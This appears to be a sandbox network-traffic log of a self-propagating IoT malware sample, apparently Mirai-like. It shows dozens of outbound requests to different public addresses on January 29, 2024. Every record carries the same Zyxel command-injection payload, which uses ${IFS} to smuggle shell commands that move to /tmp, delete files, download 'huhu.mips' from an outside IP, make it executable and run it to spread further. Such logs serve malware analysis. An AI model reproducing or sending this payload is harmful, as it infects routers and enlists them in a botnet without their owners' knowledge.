                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273818970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7581192.168.2.144985213.86.14.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273874998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7582192.168.2.145325476.145.80.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273893118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7583192.168.2.1448698193.96.173.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273925066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7584192.168.2.1440370211.114.209.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273966074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7585192.168.2.1454246166.65.148.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.273979902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7586192.168.2.1437206133.173.111.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274040937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7587192.168.2.1439224164.250.94.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274070978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7588192.168.2.145049096.4.127.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274139881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7589192.168.2.144115236.17.141.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274171114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7590192.168.2.145328083.222.27.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274199009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7591192.168.2.145343448.146.18.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274236917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7592192.168.2.144698450.237.217.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274329901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7593192.168.2.145951841.184.145.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274385929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7594192.168.2.1453008201.62.70.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274430990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7595192.168.2.1433126173.90.199.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274456978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7596192.168.2.1440130112.163.30.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274492025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7597192.168.2.145782269.219.65.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274533033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7598192.168.2.144230295.248.150.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274560928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7599192.168.2.1445670174.131.155.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274616003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7600192.168.2.144112241.94.76.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274651051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7601192.168.2.1444856107.159.78.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274703026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7602192.168.2.1435064115.202.110.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274728060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7603192.168.2.1455032182.5.178.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274766922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7604192.168.2.1457682197.69.17.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274799109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7605192.168.2.1442974185.126.36.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274827003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7606192.168.2.145237814.45.102.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274880886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7607192.168.2.1458012199.186.198.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274918079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7608192.168.2.145587679.2.232.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274955988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7609192.168.2.1460256220.107.164.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.274988890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7610192.168.2.145094870.129.126.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275032043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7611192.168.2.1443614210.131.184.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275053978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7612192.168.2.14332525.56.197.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275089979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7613192.168.2.145827060.67.176.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275134087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7614192.168.2.1442350169.241.167.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275166988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7615192.168.2.1457158169.18.197.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275202036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7616192.168.2.14423329.89.169.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275229931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7617192.168.2.145446859.226.12.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275257111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7618192.168.2.144293086.119.196.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275304079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7619192.168.2.1442450145.115.104.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275333881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7620192.168.2.144018090.48.100.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275372028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7621192.168.2.145540442.37.72.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275429964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7622192.168.2.1448726162.214.118.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275461912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7623192.168.2.1435538136.216.162.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275516987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7624192.168.2.1454132174.164.72.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275546074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7625192.168.2.145730892.117.170.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275578976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7626192.168.2.1434198197.153.192.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275631905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7627192.168.2.145365866.177.148.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275681973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7628192.168.2.1444880184.150.240.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275732040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7629192.168.2.1449226120.98.206.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275763988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7630192.168.2.143398686.72.194.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275789976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7631192.168.2.1448032136.168.88.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275856018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7632192.168.2.1441498193.188.228.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275904894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7633192.168.2.145239612.47.156.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275933027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7634192.168.2.1458392171.115.121.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.275985003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7635192.168.2.1441264128.227.14.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276057005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7636192.168.2.1447812152.225.160.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276101112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7637192.168.2.1457318201.106.27.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276141882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7638192.168.2.143303871.31.67.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276184082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7639192.168.2.1459624120.43.119.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276225090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7640192.168.2.145795673.18.172.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276245117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7641192.168.2.144400817.248.14.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276293993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7642192.168.2.1445860158.71.113.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276318073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7643192.168.2.1460268161.41.93.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276355982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7644192.168.2.1450642116.4.152.16443
                                              TimestampBytes transferredDirectionData
